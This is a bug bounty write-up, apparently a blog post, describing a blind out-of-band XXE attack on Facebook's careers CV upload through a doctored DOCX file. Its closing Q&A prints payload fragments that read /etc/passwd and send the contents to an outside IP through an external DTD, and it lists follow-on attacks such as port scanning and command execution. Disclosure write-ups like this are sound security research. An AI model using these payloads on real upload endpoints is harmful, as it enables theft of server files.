In one day I decided to stop hunting Bugs in Facebook Android, IOS and Windows phone apps and start hunting bugs in facebook.com website. I said to myself can i hack Facebook? or any of Facebook’s websites or servers? I said why not?!
Facebook Tough Security:
Facebook as you know is pretty secure because of many people already reported high severity security bugs since 2010 and they patched a dangerous XML External Entity (XXE) Processing Vulnerability affecting OpenID in late 2013.
They said that all of their servers are patched according to this post by their security team: https://www.facebook.com/BugBounty/posts/778897822124446
I thought it is a DEAD end and I won’t find any XXE vulnerabilities after Facebook patched their servers with Takedown tool they developed but I challenged myself to find XXE in Facebook and after some time digging and hunting, I found this URL: https://www.facebook.com/careers/
I tried to upload my CV and it was accepted and uploaded successfully BUT I can only upload PDF and DOCX files but I already know that .docx files are zipped xml files developed by Microsoft according to wikipedia: http://en.wikipedia.org/wiki/Office_Open_XML
I simply opened MS word 2010 then typed some random text and saved it on my desktop as: CV.docx after that i successfully uploaded it to Facebook and Nothing fancy happened as you expected but I must find a vulnerability today or i will lose my challenge
Injecting XML Payload inside CV.docx to read /etc/passwd:
I quickly opened CV.docx with 7zip program on windows 7 and extracted all the contents of CV.docx file then I found some xml files after that I decided to open this file: [Content_Types].xml and insert this innocent xml code:
The Evil Twin:
I already have another file ext.dtd waiting in mohaab007 directory and here is the content of ext.dtd:
Now I have a forged CV.docx file and it is ready to Rock after that i opened port 80 in my home router and started python simple http server:
mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …
I inserted my External IP address and all I want to see is a response in python http server saying that something is trying to connect to me. Now every thing is good and then i uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute but Nothing happened.
I said to myself it is a total failure and I will check my Facebook profile instead and chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minuteor so chatting and browsing but now it is time to stop python http server and close Facebook and everything .
I was going to close my terminal window and I was shocked to see that something connected to my python http server:
I said WOOOOOOT I forced a server belongs to Facebook to connect to my Python HTTP server using a sneaky way and now I can DO:
1- DoS on the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con
2- TCP scans using HTTP external entities (including behind firewalls since application servers often have world view different from that of the attacker)
3- Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back)
4- DoS on other systems (if parsing system is allowed to establishTCP connections to other systems)
5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)
6- Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS.
7- Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper.
I tried to read system files but the application doesn’t have privileges to read files or it might be a protection in place or or or … BUT I am 100% sure it is Blind XXE Out Of Band (OOB) plus it was a time-consuming process because I need to upload and wait the result after 15 minutes or more.
I didn’t waste too much time and reported it to Facebook Security team and They rejected my bug report and said:
I sent a reply and they said:
Now I am LOST and said to myself HAHAHA it was a good time but it is over and it is not a Vulnerability after all but I got two connections from Facebook’s server plus CV.docx file is corrupted and can’t be opened with MS Office.
The Hope and The Promise:
After exchanging emails with Facebook security team, i got this reply:
Now it is time to take a rest and wait them to fix it…..
Now it is fixed and Facebook rewarded me with a nice bounty after that I found similar vulnerabilities in other websites using the same method.
The funny thing is Facebook said that they patched all of their servers by adding this line: libxml_disable_entity_loader(true) however I forced Facebook server to parse my external entities to do things I wanted and you can watch a video below showing you how I did it.
POC Video ( Facebook Blind XXE OOB):http://web.archive.org/web/20160315025854if_/http://www.youtube.com/embed/G17cdBicmJg?wmode=opaque&enablejsapi=1
The Unexpected Reward:
I am Listed in Facebook White hats (2014):
The Bottom Line: Facebook was suffering from an unexpected and sneaky XXE vulnerability but they fixed it and rewarded me for helping them.
Compare the risks:
Here is a comparison between Old XXE (OpenID) and My XXE (DOCX):
Facebook’s Official Reply:
1.How did you put the extracted Docx data back into a docx?
I Opened CV.docx using 7zip windows app and insert XML code code then closed 7zip app and saved changes.
2. What do you mean you put the ext.dtd into your directory?
The Purpose of a DTD (Document Type Definition) like (ext.dtd) is to define the legal building blocks of an XML document. Using External DTD file to exfiltrate data from other entities like SYSTEM entities is a trick from Alexey Osipov and Timur Yunusov.
3- In this part “http://184.108.40.206/FACEBOOK-HACKED?%25file;’>” would I replace that IP with my own?
4- Do you think this would work on other job type websites where you can submit a resume or just specifically Facebook?
Yes, I tried it on other websites like coinbase.com and it worked and i was able to read system files.
5- In the part where it says: “I inserted my external IP address and all i want to see is a response in python http server saying that something is trying to connect to me” where did you insert the IP?
I inserted my IP in ext.dtd file:
<!ENTITY % all
“x25; send SYSTEM ‘http://220.127.116.11/FACEBOOK-HACKED?%25file;’>”
and in XXE Payload:
DOCTYPE root [
<!ENTITY % file SYSTEM “file:///etc/passwd”>
dtd SYSTEM “http://18.104.22.168/ext.dtd”>
6- What exactly did all that code you input do, specifically?
I highly recommend you to read this post: